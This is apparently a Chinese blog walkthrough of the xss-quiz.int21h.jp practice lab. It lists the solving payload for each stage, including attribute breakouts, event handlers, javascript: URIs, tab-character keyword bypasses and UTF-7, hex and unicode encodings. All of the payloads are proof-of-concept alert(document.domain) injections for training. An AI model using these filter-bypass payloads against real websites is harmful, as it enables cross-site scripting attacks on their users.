XSS Challenges xss-quiz.int21h.jp
概述:
https://xss-quiz.int21h.jp/
Stage #1
payload: <script>alert(document.domain);</script>
Stage #2
http://xss-quiz.int21h.jp/stage2.php?sid=e93e71eed43c3ab5668af6a5aa603cf66eedce70
尝试: <script>alert(document.domain);</script> 未果
input 没有闭合
payload: "><svg οnlοad=alert(document.domain)>
Stage #3
http://xss-quiz.int21h.jp/stage-3.php?sid=d362dd49b96c30f3e9a4a6ea0abafb0cef59ed2d
备注:这里因为都是post请求,p1 变量是不存在跨站的,p2变量才存在问题,因此需要抓包
;javascript:alert(document.domain);//
p2=<script>alert(document.domain);</script>
Stage #4
http://xss-quiz.int21h.jp/stage_4.php?sid=d47663090ecc0b8d55ae73ee3753ead52c63103e
p3 为隐藏的属性,使用inspector删除掉text=hidden
payload:"><svg οnlοad=alert(document.domain)>;
Stage #5
http://xss-quiz.int21h.jp/stage–5.php?sid=e9dd07b6e86c5314a2e574e887faa9482de330bf
通过尝试发现,闭合即可
<input type="text" name="p1" maxlength="15" size="30" value="hack404">
但是由于前端对字符数量做了限制,因此抓包修改绕过
Stage #6
http://xss-quiz.int21h.jp/stage-no6.php?sid=b76ebfa651652f2c22f8ddbe264941287667706c
问题点:对< > 做了转移,利用事件进行绕过
<input type="text" name="p1" size="50" value="" οnmοuseοver=alert(document.domain);//">
payload:
" οnmοuseοver=alert(document.domain);//
123" οnmοuseοver="alert(document.domain);
<input type="text" name="p1" size="50" value="123" οnmοuseοver="alert(document.domain);">
Stage #7
http://xss-quiz.int21h.jp/stage07.php?sid=f433ab35e367d5a94100aa4e0f694c3e63d67105
<input type="text" name="p1" size="50" value=<script>alert(document.domain);</script>>
<input type="text" name="p1" size="50" value=;οnmοuseοver=alert(document.domain);//>
对< > " ' 都已近做了转义
payload: view plaincopyprint οnmοusemοve=alert(document.domain)
Stage #8
http://xss-quiz.int21h.jp/stage008.php?sid=4301b185b563c91208e0af232d7f016885e863e0
a 标签,插入,点击即可触发
<a href="javascript:alert(document.domain);">javascript:alert(document.domain);</a>
Stage #9
http://xss-quiz.int21h.jp/stage_09.php?sid=558484a712d793c446e3dc409601eaf126e73d25
此问题,目前的浏览器已经不支持,因为它依赖于对UTF-7的支持
Solution:+ACI- οnmοuseοver=+ACI-alert(document.domain)+ADsAIg- x=+ACI-
p1=1%2bACI- οnmοuseοver=%2bACI-alert(document.domain)%2bADsAIg-&charset=euc-jp
Stage #10
http://xss-quiz.int21h.jp/stage00010.php?sid=1b96f5c206c187751811fb9267a02c109c7e1276
<input type="text" name="p1" size="50" value=""><svg οnlοad=alert(document.)>">
看来是长字符限制了,我们尝试短的字符数尝试下
payload: " οnmοuseοver=alert(document.domdomainain); x="
<input type="text" name="p1" size="50" value="" οnmοuseοver=alert(document.domain); x="">
Stage #11
http://xss-quiz.int21h.jp/stage11th.php?sid=756e90d9a168c24e2abbc43d1f4409ce6ff70de3
这里主要是针对关键字,进行了混淆
"><a href="javascript:alert(document.domain);">hack404</a>
<input type="text" name="p1" size="50" value=""><a href="javaxscript:alert(document.domain);">hack404</a>">
这里我们使用特殊字符进行绕过:
%09 Horizontal tab
"><a href="javascr	ipt:alert(document.domain);">hack404</a>
<a href="javascr	ipt:alert(document.domain);">hack404</a>">
Stage #12
http://xss-quiz.int21h.jp/stage_no012.php?sid=188b00a4305c62ea415313484b57a9a3b59df5cb
Passed with IE
Stage12: http://xss-quiz.int21h.jp/stage_no012.php?sid=188b00a4305c62ea415313484b57a9a3b59df5cb
Solution: "οnmοuseοver=alert(document.domain);
Stage #13
http://xss-quiz.int21h.jp/stage13_0.php?sid=49a2e48f78ade853ecd72a274e49102a9b096fad
Passed with IE
Stage13: http://xss-quiz.int21h.jp/stage13_0.php?sid=49a2e48f78ade853ecd72a274e49102a9b096fad
Solution: xss:expression(alert(document.domain));"
Stage #14
http://xss-quiz.int21h.jp/stage-_-14.php?sid=cdfba63593b9c07d7b1b7e41790aa5de3ac4bcd8
Passed with IE
Stage14: http://xss-quiz.int21h.jp/stage-_-14.php?sid=cdfba63593b9c07d7b1b7e41790aa5de3ac4bcd8
Solution: xss:expre/**/ssion(alert(document.domain));"
Stage #15
http://xss-quiz.int21h.jp/stage__15.php?sid=26ac2a0522c04a788c217fd8d7847aab1626f726
hex encode :
< >
\x3c \x3e
payload:
\x3cscript\x3ealert(document.domain);\x3c/script\x3e
Stage #16
http://xss-quiz.int21h.jp/stage00000016.php?sid=67973758e07ac879612c31437a2e1fb283b760e7
unicode encoding < >
https://www.branah.com/unicode-converter
\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e
Stage #17
http://xss-quiz.int21h.jp/stage-No17.php?sid=53342e06720dc7d4fa4224eb3c13bf966d823056
存在于老版本的IE
Stage #18
http://xss-quiz.int21h.jp/stage__No18.php?sid=170f1d30f88cf627174033ec5b73578276b94fc3
存在于老版本的IE
Stage #19
http://xss-quiz.int21h.jp/stage_–19.php?sid=787870a01e603b0c0d0d6c464c0595883e2c10ce
访问404了。。
参考:
https://blogs.tunelko.com/2013/12/02/xss-challenges/
https://github.com/matachi/MaTachi.github.io/blob/master/src/pages/solutions-to-the-wargame-xss-challenges-at-xss-quiz-int21h-jp.md
转载于:https://www.cnblogs.com/hack404/p/10736767.html
XSS Challenges xss-quiz.int21h.jp相关推荐
- XSS Challenges stage#1-10闯关详解
XSS Challenges stage1-10闯关详解 文章目录 XSS Challenges stage1-10闯关详解 0x01 xss challenges 闯关环境准备 1.XSS chal ...
- 黑客之XSS注入练手:XSS Challenges通关指南
本文目录: [TOC] 一.XSS Challenges介绍 靶场地址:http://xss-quiz.int21h.jp/ 相对于别的靶场来说,这是一个模拟真实环境的xss平台,页面不会给出任何提示 ...
- XSS Challenges
一个xss练手的小平台 http://xss-quiz.int21h.jp/ 一共19关,每一关根据提示执行js : alert(document.domian); 第一关 直接插入测试 < ...
- XSS Challenges闯关1-6
第一关: 靶场链接:XSS Challenges (by yamagata21) - Stage #1 第一关截图:(翻译为中文后) 选中Hint查看提示:显示非常容易,但是图中显示必须要用alert ...
- xss challenges闯关详细(6-10)
XSS Challenges (by yamagata21) - Stage #1 目录 一.第六关 二.第七关 三.第八关 四.第九关 五.第十关 一.第六关 输入good man测试 回显位置,输 ...
- XSS学习笔记:XSS Challenges 1-19通关全详解
前言 学习下XSS 主要是XSS Challenges 平台 共19关 模仿真实xss挖洞的情景,用浏览器中的f12中搜索,找出我们控制的代码所在的位置 思考那些个位置哪个或哪几个位置可以被注入我们想 ...
- XSS入门 XSS Challenges靶场搭建/前五关/基础教程
前面写了很多XSS漏洞的利用,这一章开始重点在XSS漏洞的挖掘和如何注入script代码上,和sql注入相类似 目录 一.实验环境--XSS Challenges 二.探测XSS过程 第一关 第二关 ...
- XSS练习平台【XSS Challenges】
以下来自XSS练习平台----XSS Challenges 这个练习平台没有像alert(1)to win类似的平台一样会给出关键的源代码,并且会在页面给予反馈.这是一个模仿真实xss挖洞的情景,在X ...
- XSS平台 XSS挑战之旅 解题记录 writeup
XSS平台 XSS挑战之旅 解题记录 writeup level1 level2 level3 level4 level5 level6 level7 level8 level9 level10 le ...
最新文章
- JS将EXCEL文件导入前端第一行未出现或者出现F1F2F3的解决方法……
- python反射机制_详解python之反射机制
- hdu4081 最小树+DFS或者次小树的变形
- s7-300 第9讲 定时器
- 联想打印机7256显示更换墨盒_惠普打印机涉嫌垄断?只认自家“昂贵”墨盒,成本太高招架不住...
- Hive小文件问题:如何产生、造成影响、解放办法
- 如何用unit test测试controller_如何用电缆故障测试仪冲闪测试确定故障点?
- Java无所不能的反射在Android中需要熟练的知识
- customErrors与错误页面
- 2022 年第十二届 MathorCup 高校数学建模挑战赛C题解析
- 圣诞老人python代码_用Python画圣诞老人的N种方法
- 商品房价不会下跌的六大理由
- cpu 调频 温度 ondemand
- Plustoken重要操盘手已被遣返回国,警方正全力侦查
- android支付宝转跳转,APP跳转支付宝指定界面
- 怎么给PDF文档加页码,PDF文档加页码的方法
- 【K210】K210学习笔记七——使用K210拍摄照片并在MaixHub上进行训练
- 基于tabular包的Latex表格尺寸设置方法(列宽和行高)
- qq 4 android,Android QQ HD v5.5.4 正式版发布
- CentOS 7 源码安装 apache 及配置